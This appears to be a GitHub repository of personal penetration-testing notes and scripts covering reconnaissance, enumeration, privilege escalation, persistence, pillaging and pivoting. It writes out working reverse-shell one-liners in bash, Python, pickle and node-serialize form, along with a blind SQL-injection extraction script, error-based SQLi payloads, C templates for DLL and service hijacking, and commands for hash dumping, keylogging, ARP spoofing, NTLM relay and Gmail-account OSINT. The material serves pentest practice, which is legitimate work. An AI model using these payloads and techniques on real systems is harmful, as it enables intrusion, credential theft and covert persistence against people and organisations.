├── docs ├── bruteforcing.md ├── misc.md ├── pivoting.md ├── osint-gmail.md ├── persistence.md ├── reverseshells.md ├── pillaging.md ├── gather-info.md ├── enumerate.md ├── exploit-general.md ├── scanning.md ├── osint-cheatsheet.md ├── privesc.md ├── shellcode.md ├── exploit-win-py3-bof.md └── king-of-the-hill.md ├── scripts ├── rpc-getusers.sh ├── windows_dll.c ├── sqli_blind.sh ├── windows_service.c └── fftstego_picture.py └── README.md /docs/bruteforcing.md: -------------------------------------------------------------------------------- 1 | # Bruteforcing 2 | 3 | ## [⬅ Back to Index](..../README.md) 4 | 5 | --- 6 | 7 | ## Patator 8 | 9 | ### SSH 10 | 11 | * `-x ignore:code=1` 12 | -------------------------------------------------------------------------------- /scripts/rpc-getusers.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | [ -z $1 ] && exit 1 3 | # Use linux-default-installs repo to set up the symlink used below (seclists) 4 | for user in $(cat /opt/wordlist-users-names.txt); 5 | do rpcclient -U "" $@ -N --command="lookupnames $user" \ 6 | | grep -i "user:" \ 7 | || echo "User ${user} not found or access denied."; 8 | done 9 | -------------------------------------------------------------------------------- /docs/misc.md: -------------------------------------------------------------------------------- 1 | # Miscellaneous 2 | 3 | ## [⬅ Back to Index](../README.md) 4 | 5 | --- 6 | 7 | ## Stego 8 | 9 | * [McAfee check for steganography in files](https://www.mcafee.com/enterprise/en-us/downloads/free-tools/steganography.html) 10 | 11 | ## Social Engineering 12 | 13 | * [LinDrop - Linux Desktop file spoofing](https://github.com/securemode/LinDrop/blob/master/LinDrop.py) 14 | 15 | ## Tunneling 16 | 17 | ### DNS 18 | 19 | * [Iodine DNS Tunnel](https://github.com/yarrick/iodine) -------------------------------------------------------------------------------- /scripts/windows_dll.c: -------------------------------------------------------------------------------- 1 | // For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o revshell.dll 2 | // For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o revshell.dll 3 | 4 | #include 5 | 6 | BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { 7 | if (dwReason == DLL_PROCESS_ATTACH) { 8 | system("cmd.exe /k whoami /all > c:\\temp\\revshell.txt"); 9 | ExitProcess(0); 10 | } 11 | return TRUE; 12 | } 13 | -------------------------------------------------------------------------------- /docs/pivoting.md: -------------------------------------------------------------------------------- 1 | # Pivoting 2 | 3 | ## [⬅ Back to Index](../README.md) 4 | 5 | --- 6 | 7 | ## Metasploit General 8 | 9 | * `run autoroute -s ` (inside a session) 10 | * `use post/multi/manage/autoroute` -> `set session x` -> `run` 11 | * `use auxiliary/server/socks4a` - Set up local SOCKS4 proxy 12 | * Configure proxychains4 (/etc/proxychains.conf) to route through this proxy 13 | 14 | ## Remote Dynamic Port Forward 15 | 16 | >todo 17 | 18 | ## Exploit through Double Pivot 19 | 20 | >todo 21 | 22 | ## Local Dynamic Port Forward 23 | 24 | >todo 25 | -------------------------------------------------------------------------------- /scripts/sqli_blind.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | export checkstring="Enter DOM return behaviour here for boolean true response" 4 | 5 | charset=`echo {0..9} {a..Z} \. \: \, \; \- \_ \@` 6 | export url="$1" 7 | export maxlength=$2 8 | export query=$3 9 | export result="" 10 | 11 | echo "Extracting results for the $query:" 12 | for ((j=1;j<=$maxlength;j+=1)) 13 | do 14 | export nchar=$j 15 | for i in $charset 16 | do 17 | wget "$url?parameter=true_return' and substring(($query),$nchar,1)='$i" -q -0 - | grep "$checkstring" &>/dev/null 18 | if [ "$?" == "0" ] 19 | then 20 | echo Character number $nchar found: $i 21 | export result+=$i 22 | break 23 | fi 24 | done 25 | done 26 | 27 | echo Result: $result 28 | -------------------------------------------------------------------------------- /docs/osint-gmail.md: -------------------------------------------------------------------------------- 1 | 2 | # Gmail account OSINT 3 | 4 | ## [⬅ Back to Index](../README.md) 5 | 6 | --- 7 | 8 | ## Get `@gmail.com` Google ID 9 | 10 | ID should look like `101299910324306641283` 11 | 12 | ### Hangouts Method 13 | 14 | 1. https://hangouts.google.com/ 15 | 2. Click `New conversation` 16 | 3. Open network tab in developer tools (F12) 17 | 4. Look through the queries and locate json that has the email address present 18 | 5. Copy the `"personId"` value 19 | 20 | ### Use online tools to get ID 21 | 22 | * 23 | 24 | ## View public content from that user 25 | 26 | Suffix the ID you have to each link and visit: 27 | 28 | * Maps reviews and photos - 29 | * Public photos - 30 | * Public drive - 31 | * Youtube channel - 32 | 33 | ## Bonus 34 | 35 | Automated method (using selenium chromedriver) to do the above, however less granularity (cant see their reviews text): 36 | 37 | * 38 | -------------------------------------------------------------------------------- /docs/persistence.md: -------------------------------------------------------------------------------- 1 | # Persistence 2 | 3 | ## [⬅ Back to Index](../README.md) 4 | 5 | --- 6 | 7 | ## General 8 | 9 | ### Metasploit (General) 10 | 11 | * Execute programs - `execute -f /program -i -c` 12 | * Local Port forward - `portfwd add -l 8080 -p 80 -r x.x.x.x` 13 | 14 | ## Windows 15 | 16 | ### Enable psexec usage (Pass-The-Hash) 17 | 18 | * `reg setval -k 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -v LocalAccountTokenFilterPolicy -t REG_DWORD -d 1` 19 | 20 | ### Autorun 21 | 22 | * `reg setval -k HKLM\software\microsoft\windows\currentversion\run -d "" -v ` 23 | 24 | ### Metasploit (Win) 25 | 26 | * Dump hashes: 27 | * `hashdump` 28 | * `run post/windows/gather/smart_hashdump` 29 | * Enable RDP (currently supported method) - `run post/windows/manage/enable_rdp` 30 | * Impersonation - `use incognito` -> `list_tokens -u` -> `impersonate_token ` 31 | 32 | ### Other Scripts / Git Resources 33 | 34 | * [UACME - UAC Bypass Techniques](https://github.com/hfiref0x/UACME) 35 | * [Veil-Evasion (Veil 3+)](https://github.com/Veil-Framework/Veil) 36 | * RDP Clients for Linux: 37 | * `rdesktop` 38 | * `xfreerdp /u:user /pth: /v:x.x.x.x` (RDP with Pass-The-Hash functionality - "freerdp-x11" in package manager) 39 | -------------------------------------------------------------------------------- /docs/reverseshells.md: -------------------------------------------------------------------------------- 1 | # Reverse Shells 2 | 3 | ## [⬅ Back to Index](../README.md) 4 | 5 | --- 6 | 7 | ```bash 8 | = your attack station ip 9 | ``` 10 | 11 | ## Plain Bash Netcat 12 | 13 | ```bash 14 | rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat 8888 > /tmp/f 15 | ``` 16 | 17 | ## Python2 / Python3 18 | 19 | ```bash 20 | /usr/bin/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' 21 | ``` 22 | 23 | ## Python Class Injection (Bash Netcat) 24 | 25 | ```python 26 | import pickle 27 | import sys 28 | import base64 29 | 30 | cmd = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat 8888 > /tmp/f' 31 | 32 | class rce(object): 33 | def __reduce__(self): 34 | import os 35 | return (os.system,(cmd,)) 36 | 37 | print(base64.b64encode(pickle.dumps(rce()))) 38 | ``` 39 | 40 | ## NodeJS Module - node-serialize Injection (Bash Netcat) 41 | 42 | ```js 43 | _$$ND_FUNC$$_function (){x=require('child_process').exec('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat 8888 > /tmp/f', function(error, stdout, stderr) { console.log(stdout) });return x;}() 44 | ``` -------------------------------------------------------------------------------- /docs/pillaging.md: -------------------------------------------------------------------------------- 1 | # Pillaging 2 | 3 | ## [⬅ Back to Index](../README.md) 4 | 5 | --- 6 | 7 | ## General 8 | 9 | ### MSF 10 | 11 | * **Keylogging** 12 | * `keyscan_start` 13 | * `keyscan_dump` - Dump all captured 14 | * >todo 15 | * **Gather live hosts on netblock** 16 | * `use post/multi/gather/ping_sweep` 17 | * `use post/windows/gather/arp_scanner` (Win Beacon) 18 | * `run arp_scanner -r x.x.x.x/24` 19 | 20 | ### Spoofing 21 | 22 | * Enable port forward - `echo 1 > /proc/sys/net/ipv4/ip_forward` 23 | * Use `arpspoof`, `bettercap`, or `ettercap` 24 | 25 | ### Shares 26 | 27 | * CIFS mount - `mount -t cifs ///share /mnt/lolz -o rw,vers=1.0,user=,password=` 28 | 29 | ## Windows 30 | 31 | ### Powershell Empire 32 | 33 | * [PowerSploit - PowerView](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon) 34 | * `Get-NetComputer` / `Get-NetComputers -full` 35 | * `Get-NetShare` 36 | * `Get-NetUser` 37 | 38 | ### MSF (Win) 39 | 40 | * Auto enum - `run winenum` 41 | * Privs - `run post/windows/gather/win_privs` 42 | 43 | ### Windows - Other Scripts / Git Resources 44 | 45 | * SessionGopher (WMI methods of gathering session info) - 46 | 47 | ## Linux 48 | 49 | ### MSF (Linux) 50 | 51 | ### Linux - Other Scripts / Git Resources 52 | 53 | * [3snake (Gather creds from new processes)](https://github.com/blendin/3snake) -------------------------------------------------------------------------------- /docs/gather-info.md: -------------------------------------------------------------------------------- 1 | # Public Information Gathering 2 | 3 | ## [⬅ Back to Index](../README.md) 4 | 5 | --- 6 | 7 | ## Business Information 8 | 9 | ### Generic 10 | 11 | * [Job postings - Indeed](https://indeed.com/) 12 | * [Community Reviews + Job postings - Glassdoor](https://www.glassdoor.com) 13 | * [Company "Wiki" - Crunchbase](https://www.crunchbase.com) 14 | * [Startups and private sector - INC](https://www.inc.com) 15 | * [Financial - Google Search](https://www.google.com/finance) 16 | * [People - Spokeo](https://www.spokeo.com) 17 | 18 | ### US Specific 19 | 20 | * [DUNS + CAGE codes - System for Award Management - SAM](https://www.sam.gov/SAM/) 21 | * [EDGAR - Electronic Data Gathering, Analysis and Retrieval system - SEC](https://www.sec.gov/edgar/search-and-access) 22 | * [Job postings - Monster](https://www.monster.com) 23 | * [People - PeopleFinders](https://www.peoplefinders.com) 24 | 25 | ### AU Specific 26 | 27 | * [Job postings - Seek](https://www.seek.com.au) 28 | 29 | ## Harvesting Data 30 | 31 | * [Automated - Spiderfoot](https://github.com/smicallef/spiderfoot) 32 | * [Automated - FOCA - Fingerprinting Organizations with Collected Archives](https://www.elevenpaths.com/labstools/foca/index.html) 33 | * [Automated - theHarvester](https://github.com/laramies/theHarvester) 34 | 35 | ## Archived Web Information 36 | 37 | * [AU - Trove](https://webarchive.nla.gov.au/collection) 38 | * [Generic - Archive.org](https://web.archive.org) 39 | * [Generic - Archive.today](https://archive.today) 40 | * Generic - Google Cache Search: "cache:[websitehere]" without brackets 41 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # poor-mans-pentest-notes 2 | 3 | Notes for efficient and easier engagements - my collection when im feeling lazy. 4 | 5 | --- 6 | 7 | ## [OSINT Cheatsheet](docs/osint-cheatsheet.md) / [Gmail OSINT](docs/osint-gmail.md) 8 | 9 | ## [Public Information Gathering](docs/gather-info.md) 10 | 11 | ## [Scanning](docs/scanning.md) 12 | 13 | ## [Enumeration](docs/enumerate.md) 14 | 15 | ## [Reverse Shells](docs/reverseshells.md) 16 | 17 | ## [Privilege Escalation](docs/privesc.md) 18 | 19 | ## [Exploitation](docs/exploit-general.md) 20 | 21 | ## [Persistence](docs/persistence.md) 22 | 23 | ## [Pillaging](docs/pillaging.md) 24 | 25 | ## [Pivoting](docs/pivoting.md) 26 | 27 | ## [Miscellaneous Notes](docs/misc.md) 28 | 29 | ## Uncategorized 30 | 31 | * [Windows Shellcode Notes](docs/shellcode.md) - (Bonus Antivirus undetectable payload packing) 32 | * [King of the Hill - Adversary simulation - TryHackMe](docs/king-of-the-hill.md) 33 | * [Buffer Overflow with Python 3 struggle resolution (warning: very hacky, uses Powershell)](docs/exploit-win-py3-bof.md) 34 | * [RunFinger.py historical version with MS17-010 check still present (python2)](https://github.com/lgandx/Responder/blob/daaf6f7296ee754fe37b2382d0e459f7b6e74dcc/tools/RunFinger.py) 35 | * [Passwords - Bruteforcing Services](docs/bruteforcing.md) 36 | * [Steganography - Fast Fourier Transform Image Revealer](scripts/fftstego_picture.py) 37 | * WARNING : block size exceeding max block size at 0x006bc860 38 | * [+] Try changing it with e anal.bb.maxsize 39 | 40 | --- 41 | 42 | > Under construction forever 43 | 44 | *Currently transcribing relevant content from notion: * 45 | -------------------------------------------------------------------------------- /docs/enumerate.md: -------------------------------------------------------------------------------- 1 | # Enumeration 2 | 3 | ## [⬅ Back to Index](../README.md) 4 | 5 | --- 6 | 7 | ## General 8 | 9 | ### RPC 10 | 11 | #### Users 12 | 13 | * `./scripts/rpc-getusers.sh` - Use list of potential usernames to enumerate existence via RPCclient (Alternative to RID bruteforce) 14 | 15 | ### SNMP 16 | 17 | * Gather targets: `onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt ` 18 | * `snmpwalk -v2c -c ` 19 | * `snmpenum ` 20 | * `` Type of: 21 | * linux.txt 22 | * windows.txt 23 | * cisco.txt 24 | 25 | ### NTLM Relay 26 | 27 | * Using crackmapexec (automation) 28 | * `pip3 install pipx` 29 | * `pipx ensurepath` 30 | * `pipx install crackmapexec` 31 | * `cme smb --gen-relay-list lol.txt` 32 | * Responder 33 | * `edit Responder.conf and disable SMB` 34 | * `responder -I tun0 -r -d -w` 35 | * NTLM Relay using output 36 | * `ntlmrelayx.py -tf lol.txt` 37 | 38 | ### NetBIOS 39 | 40 | * Win: `nbtstat -a ` 41 | * Lin: `nmblookup -A ` 42 | * <20> indicates file shares 43 | * `enum4linux -USGPoni ` 44 | 45 | ## Linux 46 | 47 | > todo 48 | 49 | ## Windows 50 | 51 | ### MSF 52 | 53 | * Applications: `run post/windows/gather/enum_applications` 54 | 55 | 56 | ## Web 57 | 58 | `/EyeWitness.py -f urls.txt --web --proxy-ip 127.0.0.1 --proxy-port 8080 --proxy-type socks5 --timeout 120` 59 | 60 | ### DNS 61 | 62 | #### Zone Transfer 63 | 64 | * `dig -t AXFR +nocookie @` 65 | 66 | ### Trace route 67 | 68 | * Identify gateway 69 | * `traceroute -m x` 70 | * `route` (local) 71 | * Windows - `winmtr` 72 | 73 | ### CMS 74 | 75 | #### Wordpress 76 | 77 | * 78 | * 79 | 80 | #### Joomla 81 | 82 | * 83 | 84 | #### Drupal 85 | 86 | * 87 | -------------------------------------------------------------------------------- /docs/exploit-general.md: -------------------------------------------------------------------------------- 1 | # General Exploitation 2 | 3 | ## [⬅ Back to Index](../README.md) 4 | 5 | --- 6 | 7 | ## Windows 8 | 9 | ### MSF 10 | 11 | * PSExec Scanner (Multi-load) 12 | * `use auxiliary/scanner/smb/psexec_scanner` 13 | 14 | ## Linux 15 | 16 | ### Linux File manipulation 17 | 18 | * Create files with weird characters (used for globbing manipulation): 19 | 20 | `touch -- "--file-with=weird characters"` 21 | 22 | ## Web 23 | 24 | ### SQL Injection 25 | 26 | #### SQLMap 27 | 28 | * `sqlmap -u --data "{ \"user\": \"1\"}" --tamper=charunicodeescape --dbms= --technique=` 29 | * Techniques: 30 | * Default - all 31 | * T - time based 32 | * `sqlmap -r ` 33 | * Reads URL, Method, Data/Parameters from file in the format of Network request export (e.g. from BURP). 34 | 35 | #### MSSQL 36 | 37 | * Error-based SQLi 38 | * General: `or 1 in (SELECT TOP 1 CAST(query as varchar(4096))) -- -` 39 | * Where `query` is anything like: 40 | * `@@version` 41 | * `user_name()` 42 | * `db_name(0)` calls master..sysdatabases 43 | * Get tables: `or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM db..sysobjects where xtype='U' and name no in ('','')); -- -` 44 | * Where `db` is the database name and `'',''` is an increasing list of known tables starting from blank `''` when none are known. 45 | * Columns: `db..syscolumns.name` 46 | * Data: `db..table where column not in ('')` 47 | * Casting to varchar to trigger errors: `CAST(id as varchar)+char(59)` (urlencode + to %2b if needed) 48 | * Output will look like `;` with char(59) (`;`) triggering the varchar type change. 49 | 50 | #### MySQL 51 | 52 | * Error-based SQLi 53 | * General: `union select count(*), concat(value, floor(rand(0)*2)) as z from information_schema.tables group by z;` 54 | 55 | #### PostgreSQL 56 | 57 | * Error-base SQLi 58 | * General: `select cast(query as numeric);` 59 | * `version()` 60 | * `(select table_name from information_schema.tables limit 1 offset x)` - offset 0,1,2,etc... -------------------------------------------------------------------------------- /docs/scanning.md: -------------------------------------------------------------------------------- 1 | # Scanning Notes 2 | 3 | ## [⬅ Back to Index](../README.md) 4 | 5 | --- 6 | 7 | ## ARP 8 | 9 | * MSF's `arp_scanner` 10 | * netdiscover - `sudo netdiscover` (requires root) 11 | 12 | ## MSF 13 | 14 | * `use auxiliary/scanner/portscan/tcp` 15 | 16 | ## Nmap 17 | 18 | ### [Fast Pre-Nmap Port Scanner - Rustscan](https://github.com/RustScan/RustScan) 19 | 20 | **Ref:** 21 | 22 | 1. [IANA service port assignments](https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml?search=) 23 | 2. [Free Online Scanning at HackerTarget](https://hackertarget.com/nmap-online-port-scanner/) 24 | 3. [Port listing on speedguide](https://www.speedguide.net/port.php?port=) 25 | 26 | ### ICMP Ping Sweep 27 | 28 | * `nmap -sn ` 29 | 30 | ### TCP Sweep 31 | 32 | * `nmap -n -sn -PS22,139,445 ` 33 | 34 | ### Preferred initial service ports 35 | 36 | * `nmap -p 21,22,23,25,465,587,53,80,8080,443,8443,110,995,111,123,135,137,139,143,993,389,445,1025,1433,2082-2083,2086-2087,3306,3389,5060,5432,5900,6001` 37 | 38 | ```json 39 | 21 - FTP 40 | 22 - SSH 41 | 23 - Telnet 42 | 25 - SMTP 43 | 465 - SMTP SSL 44 | 587 - SMTP TLS 45 | 53 - DNS 46 | 80 - HTTP 47 | 8080 - HTTP Proxy (Webcache) 48 | 443 - HTTP SSL 49 | 8443 - HTTP SSL Alternate 50 | 110 - POP 51 | 995 - POP SSL 52 | 111 - RPC Bind 53 | 123 - NTP 54 | 135 - MS RPC 55 | 137 - NetBIOS Name Service 56 | 139 - NetBIOS Session Service 57 | 143 - IMAP 58 | 993 - IMAP SSL 59 | 389 - LDAP 60 | 445 - MS DS (SMB) 61 | 1433 - MS SQL 62 | 1723 - PPTP 63 | 2082-2083 - CPanel 64 | 2086-2087 - CPanel WHM 65 | 3306 - MySQL 66 | 3389 - RDP 67 | 5060 - SIP 68 | 5432 - PostgreSQL 69 | 5900 - VNC 70 | 6001 - X Window Server 71 | ``` 72 | 73 | ### Flags 74 | 75 | * -Pn = No ping test (force port scan when no ICMP) 76 | * -n = No reverse DNS (dont leak ip) 77 | * -F = Reduced ports in default scan 78 | * -oN = Output normal text to file 79 | * -sV = Version enumeration 80 | * -sC = Attempt script defaults 81 | * -sT = Force TCP rather than SYN which is default when running priveleged 82 | -------------------------------------------------------------------------------- /scripts/windows_service.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #define SLEEP_TIME 5000 5 | 6 | SERVICE_STATUS ServiceStatus; 7 | SERVICE_STATUS_HANDLE hStatus; 8 | 9 | void ServiceMain(int argc, char** argv); 10 | void ControlHandler(DWORD request); 11 | 12 | //add the payload here 13 | int Run() 14 | { 15 | system("whoami /all > c:\\windows\\temp\\service.txt"); 16 | return 0; 17 | } 18 | 19 | int main() 20 | { 21 | SERVICE_TABLE_ENTRY ServiceTable[2]; 22 | ServiceTable[0].lpServiceName = "MyService"; 23 | ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain; 24 | 25 | ServiceTable[1].lpServiceName = NULL; 26 | ServiceTable[1].lpServiceProc = NULL; 27 | 28 | StartServiceCtrlDispatcher(ServiceTable); 29 | return 0; 30 | } 31 | 32 | void ServiceMain(int argc, char** argv) 33 | { 34 | ServiceStatus.dwServiceType = SERVICE_WIN32; 35 | ServiceStatus.dwCurrentState = SERVICE_START_PENDING; 36 | ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN; 37 | ServiceStatus.dwWin32ExitCode = 0; 38 | ServiceStatus.dwServiceSpecificExitCode = 0; 39 | ServiceStatus.dwCheckPoint = 0; 40 | ServiceStatus.dwWaitHint = 0; 41 | 42 | hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandler); 43 | Run(); 44 | 45 | ServiceStatus.dwCurrentState = SERVICE_RUNNING; 46 | SetServiceStatus (hStatus, &ServiceStatus); 47 | 48 | while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) 49 | { 50 | Sleep(SLEEP_TIME); 51 | } 52 | return; 53 | } 54 | 55 | void ControlHandler(DWORD request) 56 | { 57 | switch(request) 58 | { 59 | case SERVICE_CONTROL_STOP: 60 | ServiceStatus.dwWin32ExitCode = 0; 61 | ServiceStatus.dwCurrentState = SERVICE_STOPPED; 62 | SetServiceStatus (hStatus, &ServiceStatus); 63 | return; 64 | 65 | case SERVICE_CONTROL_SHUTDOWN: 66 | ServiceStatus.dwWin32ExitCode = 0; 67 | ServiceStatus.dwCurrentState = SERVICE_STOPPED; 68 | SetServiceStatus (hStatus, &ServiceStatus); 69 | return; 70 | 71 | default: 72 | break; 73 | } 74 | SetServiceStatus (hStatus, &ServiceStatus); 75 | return; 76 | } 77 | -------------------------------------------------------------------------------- /docs/osint-cheatsheet.md: -------------------------------------------------------------------------------- 1 | # OSINT Cheatsheet Compilation 2 | 3 | ## [⬅ Back to Index](../README.md) 4 | 5 | --- 6 | 7 | ## Domains / Hosting / IP Intel 8 | 9 | ### My ratings glossary 10 | 11 | ```text 12 | * **Free realestate** = *No captcha, no limits, can be used via Tor and no signup required.* 13 | * Captcha = *Google reCaptcha or hCaptcha, etc.* 14 | * Cloudflare = *Cloudflare routes the site, potential hCaptcha and Tor blocks.* 15 | * Ratelimit = *Query limit per IP or blocks specific queries for free users.* 16 | * Account = *Signup required (free but not anonymous).* 17 | * China = *Blocks Tor* 18 | ``` 19 | 20 | ### General recon services 21 | 22 | * [//centralops.net](//centralops.net/co/) - **Free realestate** 23 | * [//dnslytics.com](//dnslytics.com) - **Free realestate** 24 | * [//networking.ringofsaturn.com](//networking.ringofsaturn.com/Tools/whois.php) - **Free realestate** 25 | * [//hackertarget.com - server-info](//hackertarget.com/server-info/) - Ratelimit 26 | * [//viewdns.info](//viewdns.info) - Cloudflare 27 | * [//virustotal.com](//virustotal.com) - Captcha (on scan) 28 | * [//urlscan.io](//urlscan.io) - Captcha 29 | 30 | ### Certificates 31 | 32 | * [//crt.sh](//crt.sh) - **Free realestate** 33 | * [//censys.io](//censys.io) - Ratelimit (10 searches per IP) 34 | 35 | ### CMS 36 | 37 | * [//whatcms.org](https://whatcms.org) - Cloudflare 38 | 39 | ### DNS - Lookup & History 40 | 41 | * [//dnsdumpster.com](//dnsdumpster.com) - **Free realestate** 42 | * [//securitytrails.com](//securitytrails.com) - Captcha 43 | * Append `websiteoutlook.com` to the domain name! 44 | 45 | ### Hosting - Email 46 | 47 | * [//whoxy.com](//whoxy.com/whois-lookup/) - **Free realestate** 48 | * [//whoisology.com](//whoisology.com) - Cloudflare 49 | 50 | ### Hosting - History 51 | 52 | * [//hosterstats.com](//hosterstats.com) - **Free realestate** (Seems down! Oh no - 11th Aug 2020) 53 | 54 | ### Whois 55 | 56 | * [//who.is](//who.is) - **Free realestate** 57 | * [//gwhois.org](//gwhois.org) - **Free realestate** 58 | * [//domainwat.ch](//domainwat.ch) - **Free realestate** 59 | * [//whois.domaintools.com](//whois.domaintools.com) - Captcha 60 | * [//whois.com](//whois.com/whois/) - Captcha 61 | * [//whois.meshdigital.com](//whois.meshdigital.com) - Captcha 62 | 63 | ### IP Intelligence 64 | 65 | * [//shodan.io](//shodan.io) - **Free realestate** (premium for filters) 66 | * [//greynoise.io](//greynoise.io) - **Free realestate** 67 | * [//abuseipdb.com](//abuseipdb.com) - **Free realestate** 68 | * [//spyse.com](//spyse.com) - **Free realestate** 69 | * [//threatcrowd.org](//threatcrowd.org) - **Free realestate** 70 | * [//binaryedge.io](//binaryedge.io) - Account 71 | * [//fofa.so](//fofa.so) - China 72 | -------------------------------------------------------------------------------- /docs/privesc.md: -------------------------------------------------------------------------------- 1 | # Privilege Escalation 2 | 3 | ## [⬅ Back to Index](../README.md) 4 | 5 | --- 6 | 7 | ## Windows 8 | 9 | ### Services 10 | 11 | * Posh 12 | * Get all: `Get-WmiObject -Class Win32_Service|Format-Table -Property Name,DisplayName,PathName,StartMode` 13 | * Get specific service DACLs: `Get-Acl -Path hklm:\System\CurrentControlSet\services\` 14 | * Injection to writeable service registry entry 15 | * `apt-get install gcc-mingw-w64` 16 | * `x86_64-w64-mingw32-gcc scripts/windows_service.c -o revshell.exe` 17 | * Copy `service.exe` to `C:\temp` 18 | * `reg add HKLM\SYSTEM\CurrentControlSet\services\service_with_access /v ImagePath /t REG_EXPAND_SZ /d c:\temp\revshell.exe /f` 19 | * `sc start service_with_access` 20 | * Unquoted Service Paths 21 | * `sc qc ` 22 | * `wmic service get name,displayname,pathname,startmode | findstr /i /v "c:\windows" | findstr /i /v """` 23 | 24 | ### DLLs 25 | 26 | * Scan application DLLs for preloading attack: [Rattler](https://github.com/sensepost/rattler) 27 | * Replace writeable DLL path with revshell 28 | * `apt-get install gcc-mingw-w64` 29 | * `x86_64-w64-mingw32-gcc scripts/windows_dll.c -shared -o revshell.dll` 30 | * Copy `revshell.dll` to path the service or app uses. 31 | * Restart service or open app that runs as higher privilege to trigger DLL load. 32 | 33 | ### Registry 34 | 35 | * Check if msi modules run elevated: `reg query HKCU\Software\Policies\Microsoft\Windows\Installer` 36 | * If so, use `-f msi` for venom payloads. 37 | * `msiexec /quiet /qn /i revshell.msi` 38 | 39 | ### Metasploit 40 | 41 | * `run post/multi/recon/local_exploit_suggester` 42 | * `sessions -u #` - Attempt automatic escalation to `NT-AUTHORITY\SYSTEM` 43 | * Windows Gather Privileges Enumeration Module - `post/windows/gather/win_privs` 44 | * **All Reverse shells** 45 | * `setg InitialAutoRunScript migrate -n lsass.exe` - Auto stabilise (such as Services that fail to start and kills the initial stager) 46 | * Use `-f` on the above to auto create a process `notepad.exe` to utilise (although less inconspicuous) 47 | * **SSL Reverse Shells** 48 | 1. Use `gather/impersonate_ssl` to scrape a certificate from any live HTTPS site, e.g. google.com 49 | 2. Build or use a payload with `reverse_https` 50 | 3. `set handlersslcert ./` to the certificate location created from *Step 1* 51 | 4. `set stagerverifysslcert true` 52 | 5. `run` 53 | 54 | ### Hot Potato 55 | 56 | * Posh module: 57 | 58 | ### Find Exploits 59 | 60 | * Suggest exploits for missing Windows KBs 61 | * Win 10: 62 | * < Win 7: (*Deprecated) 63 | -------------------------------------------------------------------------------- /scripts/fftstego_picture.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import cv2 4 | import numpy as np 5 | from matplotlib import pyplot as plt 6 | 7 | # Run this script against an image file to reveal potential FFT based stego 8 | 9 | if len(sys.argv)==1: 10 | print("needs file path as first arg") 11 | 12 | path = sys.argv[1] 13 | 14 | cmaptypes_available = ['Accent', 'Accent_r', 'Blues', 'Blues_r', 'BrBG', 'BrBG_r', 'BuGn', 'BuGn_r', 'BuPu', 'BuPu_r', 'CMRmap', 'CMRmap_r', 'Dark2', 'Dark2_r', 'GnBu', 'GnBu_r', 'Greens', 'Greens_r', 'Greys', 'Greys_r', 'OrRd', 'OrRd_r', 'Oranges', 'Oranges_r', 'PRGn', 'PRGn_r', 'Paired', 'Paired_r', 'Pastel1', 'Pastel1_r', 'Pastel2', 'Pastel2_r', 'PiYG', 'PiYG_r', 'PuBu', 'PuBuGn', 'PuBuGn_r', 'PuBu_r', 'PuOr', 'PuOr_r', 'PuRd', 'PuRd_r', 'Purples', 'Purples_r', 'RdBu', 'RdBu_r', 'RdGy', 'RdGy_r', 'RdPu', 'RdPu_r', 'RdYlBu', 'RdYlBu_r', 'RdYlGn', 'RdYlGn_r', 'Reds', 'Reds_r', 'Set1', 'Set1_r', 'Set2', 'Set2_r', 'Set3', 'Set3_r', 'Spectral', 'Spectral_r', 'Wistia', 'Wistia_r', 'YlGn', 'YlGnBu', 'YlGnBu_r', 'YlGn_r', 'YlOrBr', 'YlOrBr_r', 'YlOrRd', 'YlOrRd_r', 'afmhot', 'afmhot_r', 'autumn', 'autumn_r', 'binary', 'binary_r', 'bone', 'bone_r', 'brg', 'brg_r', 'bwr', 'bwr_r', 'cividis', 'cividis_r', 'cool', 'cool_r', 'coolwarm', 'coolwarm_r', 'copper', 'copper_r', 'cubehelix', 'cubehelix_r', 'flag', 'flag_r', 'gist_earth', 'gist_earth_r', 'gist_gray', 'gist_gray_r', 'gist_heat', 'gist_heat_r', 'gist_ncar', 'gist_ncar_r', 'gist_rainbow', 'gist_rainbow_r', 'gist_stern', 'gist_stern_r', 'gist_yarg', 'gist_yarg_r', 'gnuplot', 'gnuplot2', 'gnuplot2_r', 'gnuplot_r', 'gray', 'gray_r', 'hot', 'hot_r', 'hsv', 'hsv_r', 'inferno', 'inferno_r', 'jet', 'jet_r', 'magma', 'magma_r', 'nipy_spectral', 'nipy_spectral_r', 'ocean', 'ocean_r', 'pink', 'pink_r', 'plasma', 'plasma_r', 'prism', 'prism_r', 'rainbow', 'rainbow_r', 'seismic', 'seismic_r', 'spring', 'spring_r', 'summer', 'summer_r', 'tab10', 'tab10_r', 'tab20', 'tab20_r', 'tab20b', 'tab20b_r', 'tab20c', 'tab20c_r', 'terrain', 'terrain_r', 'turbo', 'turbo_r', 'twilight', 'twilight_r', 'twilight_shifted', 'twilight_shifted_r', 'viridis', 'viridis_r', 